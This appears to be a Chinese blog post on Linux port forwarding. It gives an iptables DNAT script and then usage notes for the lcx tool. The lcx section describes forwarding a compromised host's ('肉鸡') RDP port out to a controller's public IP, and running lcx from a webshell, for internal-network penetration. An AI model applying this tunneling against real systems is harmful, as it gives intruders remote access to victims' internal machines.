Linux 端口转发

iptables实现

详情见iptables初探

netIp=192.168.87.109
iptables -t nat -F
while read ip
do
	ip=($ip)
	iptables -t nat -A PREROUTING -s ${ip[0]} -d $netIp -p tcp -m tcp --dport ${ip[2]} -j DNAT --to-destination ${ip[1]}:${ip[3]}
	iptables -t nat -A POSTROUTING -d ${ip[1]} -p tcp -m tcp --dport ${ip[3]} -j SNAT --to-source $netIp 
done < .ip

#lcx转发
#/data/bin/lcx -m 1 -p1 30022 -h2 172.16.97.5 -p2 22 > /dev/null &

#vpn
#iptables -t nat -A POSTROUTING -d 220.181.86.100 -p udp --dport 60004 -j SNAT --to 175.25.244.181
#iptables -t nat -A PREROUTING -i eth1 -d 175.25.244.181 -p udp --dport 60004 -j DNAT --to-dest 220.181.86.100:60004
#iptables -t nat -A POSTROUTING -d 220.181.86.100 -p tcp --dport 60004 -j SNAT --to 175.25.244.181
#iptables -t nat -A PREROUTING -i eth1 -d 175.25.244.181 -p tcp --dport 60004 -j DNAT --to-dest 220.181.86.100:60004

.ip文件内容实例

0.0.0.0/0 192.168.87.103 53389 3389
0.0.0.0/0 192.168.87.66 43389 3389
192.168.87.0/24 192.168.87.103 51080 1080

lcx实现

lcx是一款强大的内网端口转发工具,用于将内网服务器开放的内部端口映射到本地任意端口,通过使用发现cpu占用比较高(Intel(R) Xeon(R) CPU E5506  @ 2.13GHz 使用率稳定在12.5%)。
lcx是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入侵工具,lcx在内网入侵渗透中起着重要的角色。
lcx端口转发相当于把肉鸡A(被控端)上的3389端口或其他需要连接端口转发到B机上(控制端),当然这个B机必须有外网IP,这是lcx唯一不足的地方。

lcx使用说明:
本机: lcx -listen 2222 3333
2222为转发端口,3333为本机任意未被占用的端口
肉鸡:lcx -slave 123.123.123.123 2222 127.0.0.1 3389
123.123.123.123 为本机IP,2222为转发端口,127.0.0.1为肉鸡内网IP,3389为远程终端端口
本地连接肉鸡3389时格式mstsc 127.0.0.1:3333

好了,通过lcx端口映射就可以直接连接内网服务器了。

windows 下推送本机ip的脚本

pushIpLocal.php

发表评论

电子邮件地址不会被公开。

*